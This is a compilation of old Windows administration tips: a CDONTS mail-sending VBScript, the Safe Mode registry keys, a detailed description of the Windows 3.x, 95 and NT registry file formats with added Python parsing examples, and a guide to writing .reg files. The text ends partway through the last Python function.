   'Sends email from the local SMTP service using CDONTS objects

   ' Usage:

   '   sendmail -t <to> -f <from> -s "<subject>" -b "<message>"

   '   sendmail [-help|-?]

   '

   '--------------------------------------------------


   Option Explicit

   On Error Resume Next


   Dim objSendMail, oArgs, ArgNum

   Dim strTo, strFrom, strSubject, strBody


   Set oArgs = WScript.Arguments

   ArgNum = 0


   While ArgNum < oArgs.Count

      Select Case LCase(oArgs(ArgNum))

         Case "-to","-t":

            ArgNum = ArgNum + 1

            strTo = oArgs(ArgNum)

         Case "-from","-f":

            ArgNum = ArgNum + 1

            strFrom = oArgs(ArgNum)

         Case "-subject","-s":

            ArgNum = ArgNum + 1

            strSubject = oArgs(ArgNum)

         Case "-body","-b":

            ArgNum = ArgNum + 1

            strBody = oArgs(ArgNum)

         Case "-help","-?":

            Call DisplayUsage

         Case Else:

            Call DisplayUsage

      End Select

      ArgNum = ArgNum + 1

   Wend


   If oArgs.Count=0 Or strTo="" Or strFrom="" Or _

         strSubject="" Or strBody="" Then

      Call DisplayUsage

   Else

      Set objSendMail = CreateObject("CDONTS.NewMail")

         objSendMail.From = strFrom

         objSendMail.To = strTo

         objSendMail.Subject = strSubject

         objSendMail.Body = strBody

         objSendMail.Send

      Set objSendMail = Nothing

   End If


   ' Display the usage for this script

   Sub DisplayUsage

      WScript.Echo "Usage:"

      WScript.Echo "  sendmail -t <to address> -f <from address> -s " & _

         Chr(34) & "<subject>" & Chr(34) & " -b " & Chr(34) & _

         "<message body>" & Chr(34)

      WScript.Echo "  sendmail [-help|-?]"

      WScript.Echo ""

      WSCript.Quit

   End Sub

Where in the registry the list of services started in Safe Mode lives
Author: Adam
  Date: 2002-1-13 18:35:00

 


When the system boots into "Safe Mode" or "Safe Mode with Command Prompt", the list of services that are started can be found under the following registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal

When the system boots into "Safe Mode with Networking", the list of services that are started can be found under the following registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network

The Windows registry
Author: B.D.
  Date: 2002-1-13 18:34:59

 


Agreement:
==========

The author of this document will not be responsible for any damage and/or
license violation that may occur. The information within this document is
provided "as is" without warranty of any kind...
This information was "collected" during sleepless nights, and is NOT
officially released by Microsoft! It shall give you a peek at the Windows(tm)
internals to give you a chance to recover from corrupted data.

The author has nothing to do with Microsoft, except that he uses their
products...

If you don't agree with this, stop reading this document, and delete it at
once!


History:
========

What is the registry? Where did it come from? Two questions, which I will try to
answer here. The registry is a database (at least microsoft thinks so:)
which contains configuration information about the system.
It mainly is a memory dump which is saved to one or more files on the windows
host drive. It is loaded every system-boot and remains resident until
shutdown. Since parts of it are not used during normal operation it will be
swapped out very soon. The registry appeared with windows 3.?? (sorry, I can't
remember any earlier version :-), where it was used for file associations and
the "OLE" functions (the connection between ole-id's and the applications).
This is critical information and since the registry has (almost) NO
CHECKSUM information (!), it sometimes gets corrupted. This is the main
reason for this doc.

Using windows 3.x, almost every configuration was done using good old ".INI"-
files, which were readable but slow and limited in size (64k). In windows 95
(and NT), the registry was used instead of these files. So, to edit a
particular setting, you would have to run the application which manages these
settings. :( but what if this app won't start? MS included a tool named
REGEDIT in windows 3.?? and 95, and a REGEDT32 in windows NT. You can use
these apps to edit ALL contents of the registry (in windows NT the registry
supports security, as well as it provides the security for the whole system!)

An application can open a "key", write values (variables) to it and fill them
with data. Each key represents also a value called "default" and can contain
any number of sub-keys. This will form a tree-structure as you can see at
the left half of REGEDIT. (note: REGEDIT from windows 3.?? has to be started
with /V or /Y, I can't remember now)


Where can I find the registry???
================================

That differs for each windows-version:

Version  File(s)                 Contents
3.1x     REG.DAT                 Complete windows 3.?? Registry

95       SYSTEM.DAT              System-values (HKEY_LOCAL_MACHINE)
         USER.DAT                User-values (HKEY_USERS)

NT       SYSTEM32\CONFIG\SAM     SAM-part of the registry (=NT Security)
         SYSTEM32\CONFIG\SOFTWARE Software-Specific part
                                  (HKEY_LOCAL_MACHINE\SOFTWARE)
         SYSTEM32\CONFIG\SYSTEM  System-specific part
                                 (HKEY_LOCAL_MACHINE\System)
         PROFILES\%USERNAME%\NTUSER.DAT  User-Specific part
                                         (HKEY_CURRENT_USER\{S-1-xxx...})
         PROFILES\%USERNAME%\NTUSER.MAN  like NTUSER.DAT but a
                                         MANDATORY-profile

If you are using a ROAMING-profile with windows NT, NTUSER.xxx can be on
a network-share as well...

 

Terms
=====

The registry consists of the following elements:

        Hive:   starting point of the structure. The name of a hive starts
                with the "HKEY_"-prefix. Can be seen as a "drive" in a file
                system.

Hive name               Description                    3.1     95      NT4
HKEY_CLASSES_ROOT       Points to the "class" key in
                        the "HKEY_LOCAL_MACHINE" hive,
                        the only hive in windows 3.??   X       X       X

HKEY_CURRENT_USER       Information and settings valid
                        for the currently logged in
                        user. (Points to the correct            X       X
                        key under "HKEY_USERS")

HKEY_CURRENT_CONFIG     Settings for the currently
                        active hardware profile.
                        Points to "HKEY_LOCAL_MACHINE\          X       X
                        CONTROL\CONTROLSETxxx

HKEY_USERS              Contains all currently active
                        user settings. Since NT is a
                        single user system, there
                        will be only one key (the S-ID          X       X
                        of the active user), and a
                        ".DEFAULT" key (The settings
                        for the CTRL-ALT-DEL environment)

HKEY_LOCAL_MACHINE      All local settings                      X       X

HKEY_DYN_DATA           As the name says, here you'll find      X
                        dynamic data (CPU-usage,...)


        Key:    A key to the registry can be seen as a directory in a file
                system.
        Value:  can be seen as the registry's "file"
        Data:   is the actual setting, can be seen as the contents of a
                file


Windows 3.x
===========

This registry is the easiest one. It consists of 3 blocks, which are not
"signed" at all:

Block                   Position        Size
Header                  0               32 Bytes
Navigation-Info         0x00000020      ???
Data-Block              ???             ???

The "???" marked values can be read from the header.

Header
======

Offset  Size    Description
0x0000  8 Byte  ASCII-Text: "SHCC3.10"
0x0008  D-Word  ?
0x000C  D-Word  ? (always equal the D-Word at 0x0008)
0x0010  D-Word  Number of entries in the navigation-block
0x0014  D-Word  Offset of the data-block
0x0018  D-Word  Size of the data-block
0x001C  Word    ?
0x001E  Word    ?

Values marked "?" are not important for a read-access, and therefore unknown
to me...

Navigation-Block
================

This is where chaos rules! It consists of two different, 8 byte long blocks:

        * Navigation-Info-Record,
        * Text-Info-Record

The first record in the navigation block is a navigation info record.

Navigation-Info-Record

Offset  Size    Contents
0x00    Word    Next Key (same level)
0x02    Word    First Sub-Key (one level deeper)
0x04    Word    Text-Info-Record of the key name
0x06    Word    Text-Info-Record Key-Value (default)

The values are the logical number of the block inside the file:

offset=blocksize*blocknumber+headersize

since 2 of this values are constant:

offset=8*blocknumber+0x20


Text-Info-Record
================


Offset  Size    Contents
0x00    Word    ?
0x02    Word    number of references to this text
0x04    Word    Text-length
0x06    Word    Offset of the text-string inside the data-block

To get the text-offset inside the file you have to add this offset to the
data-offset inside the header.

Data-Block
==========

The data-block only consists of a collection of text-strings. Right in front
of every text is a word which may or may not have a meaning. The offset in
the text-info record points directly to the text, the text-size has to be
defined in the text-info record too.


Windows 95
==========

the Windows95-Registry Files:

inside the windows-directory (default: C:\WINDOWS) are 2 files which are
loaded to form the registry:

        SYSTEM.DAT

and

        USER.DAT

These files are mapped to the following hives:

HKEY_LOCAL_MACHINE in SYSTEM.DAT

and

HKEY_USERS in USER.DAT

 

The file structure:
===================


Both files have the same structure. Each of them consists of 3 blocks where
1 of these blocks can be repeated.
Every block has a 4 byte long signature to help identify its contents.

ID      Block-contents          Max. size
CREG    Header                  32 Bytes @ Offset 0
RGKN    Directory information
        (Tree-structure)        ??? @ Offset 32
RGDB    The real data
        (Values and data)       max. 65535 Bytes an Offset ??

these blocks are "stuck together" with no space between them, but always
a multiple of 16 in size.

the CREG-Block
==============

Offset          Size            Contents
0x00000000      D-Word          ASCII-"CREG" = 0x47455243
0x00000008      D-Word          Offset of 1st RGDB-block
0x00000010      D-Word          # of RGDB-blocks

all other values are not needed to read the registry...


the RGKN-Block
==============

I assume that RGKN stands for ReGistry-Key-Navigation. This block contains
the information needed to build the tree-structure of the registry. This
block will be larger than 65536 bytes (0xFFFF)!

All offset-values are RELATIVE to the RGKN-block!

Offset          Size    Contents
0x00000000      D-Word  ASCII-"RGKN" = 0x4E4B4752
0x00000004      D-Word  Size of the RGKN-block in bytes
0x00000008      D-Word  Rel. Offset of the root-record
0x00000020      ????    Tree-Records (often the 1st Record)

the Tree-Record
===============

The tree-record is a "complete" registry-key. It contains the "hash"-info
for the real data stored in this key.

Offset  Size    Contents
0x0000  D-Word  Always 0
0x0004  D-Word  Hash of the key-name
0x0008  D-Word  Always -1 (0xFFFFFFFF)
0x000C  D-Word  Offset of the owner (parent)-records
0x0010  D-Word  Offset of the 1st sub-key record
0x0014  D-Word  Offset of the next record in this level
0x0018  D-Word  ID-number of the real key

the 1st entry in a "usual" registry file is a null entry with subkeys: the
hive itself. It looks the same as other keys. Even the ID-number can
be any value.

The "hash"-value is a value representing the key's name. Windows will not
search for the name, but for a matching hash-value. if it finds one, it
will compare the actual string info, otherwise continue with the next key.

End of list-pointers are filled with -1 (0xFFFFFFFF)


The ID-field has the following format:

        Bits 31..16:    Number of the corresponding RGDB-blocks
        Bits 15..0:     continuous number inside this RGDB-block.

 

The hash-method:
================

you are looking for the key:    Software\Microsoft

first you take the first part of the string and convert it to upper case

        SOFTWARE

The "\" is used as a separator only and has no meaning here.
Next you initialize a D-Word with 0 and add all ASCII-values of the string
which are smaller than 0x80 (128) to this D-Word.

        SOFTWARE = 0x0000026B

Now you can start looking for this hash-value in the tree-record.
If you want to modify key names, also modify the hash-values, since they
cannot be found again (although they would be displayed in REGEDIT)
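The hash method and the tree-record walk described above, as an added Python example (not part of the original document). SAMPLE_RGKN is a constructed block with a root record and two children; the record layout follows the tree-record table above.

```python
# Added example, not from the original document: the Windows 95 RGKN
# key-name hash described above, a pack/unpack of the 0x1C-byte tree record,
# and the hash-first sub-key walk the text describes.  SAMPLE_RGKN is a
# constructed block: a root record at 0x20 with two children.
import struct
from typing import List, Optional

TREE_RECORD = struct.Struct("<IIIIIII")   # seven D-Words = 0x1C bytes
END_OF_LIST = 0xFFFFFFFF                  # -1 terminates a chain of records


def rgkn_hash(name: str) -> int:
    """Upper-case the name, sum every ASCII code below 0x80, keep 32 bits."""
    total = 0
    for ch in name.upper():
        code = ord(ch)
        if code < 0x80:
            total += code
    return total & 0xFFFFFFFF


def hash_path(path: str) -> List[int]:
    """One hash per path component; the backslash is only a separator."""
    return [rgkn_hash(part) for part in path.split("\\") if part]


def build_tree_record(name_hash, parent, first_sub, next_rec, rgdb_block, rgdb_index):
    """Pack a tree record.  The ID field carries the RGDB block number in
    bits 31..16 and the record number inside that block in bits 15..0."""
    ident = ((rgdb_block & 0xFFFF) << 16) | (rgdb_index & 0xFFFF)
    return TREE_RECORD.pack(0, name_hash, END_OF_LIST, parent, first_sub, next_rec, ident)


def _or_none(value: int) -> Optional[int]:
    return None if value == END_OF_LIST else value


def parse_tree_record(buf: bytes, off: int) -> dict:
    """Unpack one tree record at `off` (relative to the RGKN block)."""
    zero, name_hash, minus1, parent, first_sub, next_rec, ident = \
        TREE_RECORD.unpack_from(buf, off)
    if zero != 0 or minus1 != END_OF_LIST:
        raise ValueError(f"not a tree record at 0x{off:x}")
    return {
        "hash": name_hash,
        "parent": _or_none(parent),
        "first_subkey": _or_none(first_sub),
        "next": _or_none(next_rec),
        "rgdb_block": ident >> 16,
        "rgdb_index": ident & 0xFFFF,
    }


def find_child(buf: bytes, parent_off: int, name: str) -> Optional[int]:
    """Walk the parent's sub-key chain comparing hashes, as the text says
    Windows does.  The hash is a plain sum, so anagrams collide; a real
    lookup then compares the key name stored in the RGDB record."""
    wanted = rgkn_hash(name)
    off = parse_tree_record(buf, parent_off)["first_subkey"]
    while off is not None:
        rec = parse_tree_record(buf, off)
        if rec["hash"] == wanted:
            return off
        off = rec["next"]
    return None


# Constructed sample: root at 0x20, "Software" at 0x3C, "System" at 0x58.
# Offsets are relative to the RGKN block, so the buffer starts at offset 0.
ROOT, SOFTWARE, SYSTEM = 0x20, 0x20 + 0x1C, 0x20 + 2 * 0x1C
SAMPLE_RGKN = (
    bytes(0x20)                                                 # RGKN header
    + build_tree_record(0, END_OF_LIST, SOFTWARE, END_OF_LIST, 0, 0)
    + build_tree_record(rgkn_hash("Software"), ROOT, END_OF_LIST, SYSTEM, 1, 1)
    + build_tree_record(rgkn_hash("System"), ROOT, END_OF_LIST, END_OF_LIST, 1, 2)
)
```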

the RGDB-Block
==============

Header:

Offset  Size    Contents
0x0000  D-Word  ASCII-"RGDB" = 0x42444752
0x0004  D-Word  Size of this RGDB-block
0x0020  ????    RGDB Records


RGDB-Record (Key-Information)
=============================

Offset  Size    Contents
0x0000  D-Word  record length in bytes
0x0004  D-Word  ID-number
0x0008  D-Word  ??? Size ???
0x000C  Word    text length of key name
0x000E  Word    Number of values inside this key
0x0010  D-Word  always 0
0x0014  ????    Key-name
0x????  ????    Values

The first size (record length) can be used to find the next record.
The second size value is only correct if the key has at least one value,
otherwise it is a little lower.

The key-name is not 0-terminated, its length is defined by the key-
text length field. The values are stored as records.


Value-Record
============

Offset  Size    Contents
0x0000  D-Word  Type of data
0x0004  D-Word  always 0
0x0008  Word    length of value-name
0x000A  Word    length of value-data
0x000C  ????    value-name
0x????  ????    data

Data-Types
==========

value  Contents
0x00000001 RegSZ - 0-terminated string (sometimes without the 0!)
0x00000003 RegBin - binary value (a simple data-block)
0x00000004 RegDWord - D-Word (always 4 bytes in size)

 

Windows NT (Version 4.0)
========================

Whoever thought that the registry of windows 95 and windows nt are similar
will be surprised! They only look much the same, but have completely
different structures!
Since the RGDB-blocks in the windows 95 registry are not larger than
0xFFFF, we can see that it is optimized for a 16-bit OS...
Windows NT stores its registry in a page-oriented format with blocks
of 4kb (4096 = 0x1000 bytes)

The windows NT registry has 2 different blocks, where one can occure many
times...

the "regf"-Block
================

"regf" is obviously the abbreviation for "Registry file". "regf" is the
signature of the header-block which is always 4kb in size, although only
the first 64 bytes seem to be used and a checksum is calculated over
the first 0x200 bytes only!

Offset  Size Contents
0x00000000 D-Word ID: ASCII-"regf" = 0x66676572
0x00000004 D-Word ????
0x00000008 D-Word ???? Always the same value as at 0x00000004
0x0000000C Q-Word last modify date in WinNT date-format
0x00000014 D-Word 1
0x00000018 D-Word 3
0x0000001C D-Word 0
0x00000020 D-Word 1
0x00000024 D-Word Offset of 1st key record
0x00000028 D-Word Size of the data-blocks (Filesize-4kb)
0x0000002C D-Word 1
0x000001FC D-Word Sum of all D-Words from 0x00000000 to 0x000001FB

I have analyzed several registry files (from multiple machines running
NT 4.0, German version) and could not find an explanation for the values
marked with ????; the rest of the first 4kb page is not important...


the "hbin"-Block
================

I don't know what "hbin" stands for, but this block is always a multiple
of 4kb in size.

Inside these hbin-blocks the different records are placed. The memory
management looks like a C-compiler's heap management to me...


hbin-Header
===========

Offset Size Contents
0x0000 D-Word ID: ASCII-"hbin" = 0x6E696268
0x0004 D-Word Offset from the 1st hbin-Block
0x0008 D-Word Offset to the next hbin-Block
0x001C D-Word Block-size

The values in 0x0008 and 0x001C should be the same, so I don't know
if they are correct or swapped...

From offset 0x0020 inside a hbin-block data is stored with the following
format:


Offset Size Contents
0x0000 D-Word Data-block size
0x0004 ???? Data

If the size field is negative (bit 31 set), the corresponding block
is free and has a size of -blocksize!
The data is stored as one record per block. Block size is a multiple
of 4 and the last block reaches the next hbin-block, leaving no room.


Records in the hbin-blocks
==========================


nk-Record

The nk-record can be treated as a combination of the tree-record and
key-record of the Win 95 registry.

lf-Record

The lf-record is the counterpart to the RGKN-record (the hash-function)

vk-Record

The vk-record holds the information for a single value.

sk-Record

sk (? Security Key ?) is the ACL of the registry.

Value-Lists

The value-lists contain information about which values are inside a
sub-key and don't have a header.

Data

The data of the registry are (like the value-list) stored without a
header.


All offset-values are relative to the first hbin-block and point to the
block-size field of the record-entry. To get the file offset, you have to add
the header size (4kb) and the size field (4 bytes)...

the nk-Record
=============

Offset Size Contents
0x0000 Word ID: ASCII-"nk" = 0x6B6E
0x0002 Word for the root-key: 0x2C, otherwise 0x20
0x0004 Q-Word write-date/time in windows nt notation
0x0010 D-Word Offset of Owner/Parent key
0x0014 D-Word number of sub-Keys
0x001C D-Word Offset of the sub-key lf-Records
0x0024 D-Word number of values
0x0028 D-Word Offset of the Value-List
0x002C D-Word Offset of the sk-Record
0x0030 D-Word Offset of the Class-Name
0x0044 D-Word Unused (data-trash)
0x0048 Word name-length
0x004A Word class-name length
0x004C ???? key-name

the Value-List
==============

Offset Size Contents
0x0000 D-Word Offset 1st Value
0x0004 D-Word Offset 2nd Value
0x???? D-Word Offset nth Value

To determine the number of values, you have to look at the
owner-nk-record!

The vk-Record
=============

Offset Size Contents
0x0000 Word ID: ASCII-"vk" = 0x6B76
0x0002 Word name length
0x0004 D-Word length of the data
0x0008 D-Word Offset of Data
0x000C D-Word Type of value
0x0010 Word Flag
0x0012 Word Unused (data-trash)
0x0014 ???? Name

If bit 0 of the flag-word is set, a name is present, otherwise the
value has no name (=default)
If the data-size is less than 5, the data-offset field is used to store
the data itself!


The data-types
==============

Value  Meaning
0x0001 RegSZ:   character string (in UNICODE!)
0x0002 ExpandSZ:  string with "%var%" expanding (UNICODE!)
0x0003 RegBin:  raw-binary value
0x0004 RegDWord: Dword
0x0007 RegMultiSZ: multiple strings, separated with 0 (UNICODE!)

The "lf"-record
===============

Offset Size Contents
0x0000 Word ID: ASCII-"lf" = 0x666C
0x0002 Word number of keys
0x0004 ???? Hash-Records

Hash-Record
===========

Offset Size Contents
0x0000 D-Word Offset of corresponding "nk"-Record
0x0004 D-Word ASCII: the first 4 characters of the key-name,
  padded with 0's. Case sensitive!

Keep in mind, that the value at 0x0004 is used for checking the
data-consistency! If you change the key-name you have to change the
hash-value too!

The "sk"-block
==============

(due to the complexity of the SAM-info, not yet clear)

Offset Size Contents
0x0000 Word ID: ASCII-"sk" = 0x6B73
0x0002 Word Unused
0x0004 D-Word Offset of previous "sk"-Record
0x0008 D-Word Offset of next "sk"-Record
0x000C D-Word usage-counter
0x0010 D-Word Size of "sk"-record in bytes
????
???? ???? Security and auditing settings...
????

The usage counter counts the number of references to this
"sk"-record. You can use one "sk"-record for the entire registry!


Windows nt date/time format
===========================

The time-format is a 64-bit integer which is incremented by 1 every
0.0000001 seconds (I don't know how accurate it really is!)
It starts with 0 at the 1st of January 1601 0:00! All values are
stored in GMT time! The time-zone is important to get the real
time!

 

Common values for win95 and win-nt
==================================

Offset values marking an "end of list", are either 0 or -1 (0xFFFFFFFF).
If a value has no name (length=0, flag(bit 0)=0), it is treated as the
"Default" entry...
If a value has no data (length=0), it is displayed as empty.
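The Windows 95 hash rule from earlier (sum of the ASCII codes below 0x80, giving SOFTWARE = 0x26B), the NT date format, and the nk / lf / vk / value-list layout above, exercised by a small walker. This is an added example and not part of the original document: it builds a synthetic one-hbin hive in memory (key names, values and the timestamp are made up), then parses it from the root-key offset in the regf header. Cell sizes are read as magnitudes so the walk does not depend on which sign marks a free cell; the lf hint check and the "small data lives in the offset field" rule follow the text, and treating a set bit 31 in the vk data length as the same inline signal is an assumption beyond what the text states.

```python
"""Walker for the nk / lf / vk / value-list layout described above.
A one-hbin hive is constructed in memory by build_sample_hive() and then
parsed back by read_key(); nothing is read from disk."""
import struct
from datetime import datetime, timedelta, timezone

HBIN_BASE = 0x1000          # the 4kb regf header page; hbin offsets count from here
REG_SZ, REG_DWORD = 1, 4
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

def win95_hash(name: str) -> int:
    """RGKN hash from the Windows 95 section: sum of the ASCII codes below 0x80."""
    return sum(ord(c) for c in name if ord(c) < 0x80) & 0xFFFFFFFF

def filetime_to_datetime(ft: int) -> datetime:
    """64-bit count of 100 ns ticks since 1601-01-01 00:00 UTC."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)

def cell(hive: bytes, off: int) -> bytes:
    """Payload of the cell whose size field sits at hbin-relative offset off.
    The signed size is used by magnitude, whatever sign marks a free cell."""
    size, = struct.unpack_from("<i", hive, HBIN_BASE + off)
    return hive[HBIN_BASE + off + 4:HBIN_BASE + off + abs(size)]

def read_value(hive: bytes, off: int):
    vk = cell(hive, off)
    assert vk[:2] == b"vk", "not a vk record"
    name_len, data_len, data_off, vtype, flags = struct.unpack_from("<HIIIH", vk, 2)
    name = vk[0x14:0x14 + name_len].decode("latin-1") if flags & 1 else "(Default)"
    real_len = data_len & 0x7FFFFFFF
    # data of up to 4 bytes lives in the offset field itself; a set bit 31 in the
    # length is taken (assumption) as the same signal
    if data_len & 0x80000000 or real_len <= 4:
        data = struct.pack("<I", data_off)[:real_len]
    else:
        data = cell(hive, data_off)[:real_len]
    if vtype == REG_SZ:
        return name, data.decode("utf-16-le").rstrip("\0")
    if vtype == REG_DWORD:
        return name, struct.unpack("<I", data)[0]
    return name, data

def read_key(hive: bytes, off: int) -> dict:
    nk = cell(hive, off)
    assert nk[:2] == b"nk", "not an nk record"
    ts, = struct.unpack_from("<Q", nk, 0x04)
    n_sub, lf_off, n_val, vlist_off = struct.unpack_from("<I4xI4xII", nk, 0x14)
    name_len, = struct.unpack_from("<H", nk, 0x48)
    key = {"name": nk[0x4C:0x4C + name_len].decode("latin-1"),
           "written": filetime_to_datetime(ts), "values": {}, "subkeys": []}
    if n_val:                                   # value-list: n_val offsets, no header
        vlist = cell(hive, vlist_off)
        for i in range(n_val):
            vname, vdata = read_value(hive, struct.unpack_from("<I", vlist, 4 * i)[0])
            key["values"][vname] = vdata
    if n_sub:
        lf = cell(hive, lf_off)
        assert lf[:2] == b"lf", "not an lf record"
        for i in range(struct.unpack_from("<H", lf, 2)[0]):
            sub_off, hint = struct.unpack_from("<I4s", lf, 4 + 8 * i)
            sub = read_key(hive, sub_off)
            # consistency check from the text: the hint is the first 4 name characters
            assert hint == sub["name"][:4].encode("latin-1").ljust(4, b"\0"), "lf hint mismatch"
            key["subkeys"].append(sub)
    return key

def build_sample_hive() -> bytes:
    """Constructed hive: ROOT -> Software, with a REG_SZ and a REG_DWORD value."""
    hive = bytearray(HBIN_BASE + 0x1000)
    ts = (datetime(2002, 1, 13, tzinfo=timezone.utc) - EPOCH_1601).days * 86400 * 10_000_000
    cur = 0x20                                  # first cell follows the 0x20-byte hbin header

    def alloc(payload_len):                     # size field + payload, rounded up to 8
        nonlocal cur
        off, cur = cur, cur + ((payload_len + 4 + 7) & ~7)
        return off

    def put(off, payload):
        size = (len(payload) + 4 + 7) & ~7
        struct.pack_into("<i", hive, HBIN_BASE + off, -size)
        hive[HBIN_BASE + off + 4:HBIN_BASE + off + 4 + len(payload)] = payload

    def nk(name, flags, parent, n_sub, lf, n_val, vl):
        rec = bytearray(0x4C)
        struct.pack_into("<2sHQ", rec, 0, b"nk", flags, ts)
        struct.pack_into("<II4xI4xII", rec, 0x10, parent, n_sub, lf, n_val, vl)
        struct.pack_into("<H", rec, 0x48, len(name))
        return bytes(rec) + name.encode("latin-1")

    def vk(name, vtype, data_len, data_off):
        head = struct.pack("<2sHIIIHH", b"vk", len(name), data_len, data_off, vtype, 1, 0)
        return head + name.encode("latin-1")

    o_root, o_lf, o_sw = alloc(0x4C + 4), alloc(4 + 8), alloc(0x4C + 8)
    o_vl, o_vk1, o_data, o_vk2 = alloc(8), alloc(0x14 + 7), alloc(8), alloc(0x14 + 5)
    struct.pack_into("<4s", hive, 0, b"regf")
    struct.pack_into("<III", hive, 0x24, o_root, 0x1000, 1)      # root offset, data size
    struct.pack_into("<4sII", hive, HBIN_BASE, b"hbin", 0, 0x1000)
    struct.pack_into("<I", hive, HBIN_BASE + 0x1C, 0x1000)
    put(o_root, nk("ROOT", 0x2C, 0xFFFFFFFF, 1, o_lf, 0, 0))
    put(o_lf, struct.pack("<2sHI4s", b"lf", 1, o_sw, b"Soft"))
    put(o_sw, nk("Software", 0x20, o_root, 0, 0, 2, o_vl))
    put(o_vl, struct.pack("<II", o_vk1, o_vk2))
    put(o_data, "1.0\0".encode("utf-16-le"))
    put(o_vk1, vk("Version", REG_SZ, 8, o_data))
    put(o_vk2, vk("Count", REG_DWORD, 0x80000004, 42))           # 4-byte data kept inline
    struct.pack_into("<i", hive, HBIN_BASE + cur, 0x1000 - cur)  # remaining free cell
    return bytes(hive)

def parse_sample() -> dict:
    hive = build_sample_hive()
    assert hive[:4] == b"regf", "bad signature"
    root_off, = struct.unpack_from("<I", hive, 0x24)
    return read_key(hive, root_off)
```

parse_sample() returns the tree as nested dictionaries; the lf hint assertion is the place where a key rename that forgot to update the hash-record would be caught, which is exactly the inconsistency the text warns about.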

 

simplified win-3.?? registry:
=============================

 

+-----------+
| next rec. |---+   +-----> +------------+
| first sub |   |   | | Usage cnt. |
| name      | |  +--> +------------+ | | length     |
| value     | |  | | next rec.  | | | text       |-------> +-------+
+-----------+ |  | | name rec.  |--+ +------------+  | xxxxx |
   +------------+  | | value rec. |--------> +------------+  +-------+
   v     | +------------+  | Usage cnt. |
+-----------+    |    | length     |
| next rec. |    |    | text       |-------> +-------+
| first sub |------+    +------------+  | xxxxx |
| name      |        +-------+
| value     |
+-----------+

 

Greatly simplified structure of the nt-registry:
================================================


    +-------------------------------------------------------------------------+
    v                                                                         |
+---------------+ +-------------> +-----------+  +------> +---------+   |
| "nk"  | |  | lf-rec.   |  | | nk-rec. |   |
| ID  | |  | # of keys |  | | parent  |---+
| Date  | |  | 1st key   |--+ | ....    |
| parent | |  +-----------+  +---------+
| suk-keys |-------+
| values |---------------------> +----------+
| SK-rec. |---------------+ | 1. value |--> +----------+
| class  |--+  | +----------+ | vk-rec.  |
+---------------+  |  |   | ....     |
     v  |   | data     |--> +-------+
  +------------+ |   +----------+ | xxxxx |
  | Class name | |     +-------+
  +------------+ |
    v
  +---------+ +---------+
+-----> | next sk |---> | Next sk |--+
|   +---| prev sk | <---| prev sk |  |
|   | | ....    | | ...     |  |
|   | +---------+ +---------+  |
|   |    ^      |
|   +--------------------+           |
+------------------------------------+

--------------------------------------------------------------------------------

Hope this helps....  (Although it was "fun" for me to uncover these things,
   it took me several sleepless nights ;)

The complete guide to ".reg" files
Author: joyadam@myrealbox.com
  Date: 2002-1-13 18:34:59

Sometimes, to make registry changes easier, we write scripts; but whether it is an .inf file or a VBS script, I still find the .reg file the most convenient.

The common registry operations are create, modify and delete.

--Create

There are two kinds of creation. The first is creating a subkey.
Note: if you are not clear about registry naming, see the registry naming standards manual (http://www.sometips.com/tips/registryhack/204.htm)

We create a file with the following content:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]

Then run the script, and you have created a subkey named "Test4Adam" under HKEY_LOCAL_MACHINE\SOFTWARE\.

The second is creating a value entry.
That file format is the typical one, identical to the format of a file exported from the registry; the content is as follows:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
"Test1"="Adam"
"Test2"=hex:61
"Test3"=dword:00000064

Test1 is of type "String Value"
Test2 is of type "Binary Value"
Test3 is of type "DWORD Value"

Note: if the subkey Test4Adam does not exist in your registry, this script creates it for you.

--Modify
Modifying is relatively simple: export the entries you need to change, edit them in Notepad, then import the file; I will not go into detail here.

--Delete
First, deleting a value entry. We create a file like this:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
"Test1"=-

Run the script and "Test1" under HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam is deleted;

Now let's look at deleting a subkey. We create a script like this:

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]

Run the script and HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam is deleted.

By now you should have a basic grasp of .reg files.

Finally, my thanks to John Savill.
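A reader for the .reg syntax the article uses, as an added example (not the article's own code): it turns a file into a list of operations so the changes can be reviewed before regedit imports them, and performs the header check that regedit itself applies. The sample text is constructed from the article's three snippets; `REGEDIT4` headers, `hex(N):` typed data and backslash-continued lines are handled as well, which goes slightly beyond what the article shows.

```python
"""Reader for the Version 5.00 .reg syntax shown above (added example).
SAMPLE is constructed from the article's snippets."""
import re

VALUE_LINE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')
HEADERS = ("Windows Registry Editor Version 5.00", "REGEDIT4")

SAMPLE = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
"Test1"="Adam"
"Test2"=hex:61
"Test3"=dword:00000064
"Test1"=-

[-HKEY_LOCAL_MACHINE\SOFTWARE\Test4Adam]
"""

def unescape(s: str) -> str:
    """.reg strings escape backslash and double quote with a backslash."""
    return re.sub(r"\\(.)", r"\1", s)

def parse_data(raw: str):
    """Decode the right-hand side of a value line into (type name, value)."""
    raw = raw.strip()
    if raw == "-":
        return ("delete", None)
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return ("REG_SZ", unescape(raw[1:-1]))
    if raw.lower().startswith("dword:"):
        return ("REG_DWORD", int(raw[6:], 16))
    m = re.match(r"hex(?:\((\d+)\))?:(.*)$", raw, re.IGNORECASE)
    if m:                       # hex: is REG_BINARY; hex(N): carries the numeric type N
        typ = {None: "REG_BINARY", "2": "REG_EXPAND_SZ",
               "7": "REG_MULTI_SZ"}.get(m.group(1), "hex(%s)" % m.group(1))
        return (typ, bytes(int(b, 16) for b in m.group(2).split(",") if b.strip()))
    raise ValueError("unrecognised value data: %r" % raw)

def parse_reg(text: str) -> list:
    """Operations as tuples: ("create_key", key), ("delete_key", key),
    ("set_value", key, name, type, data), ("delete_value", key, name)."""
    lines = text.replace("\r\n", "\n").split("\n")
    body = [l.strip() for l in lines if l.strip()]
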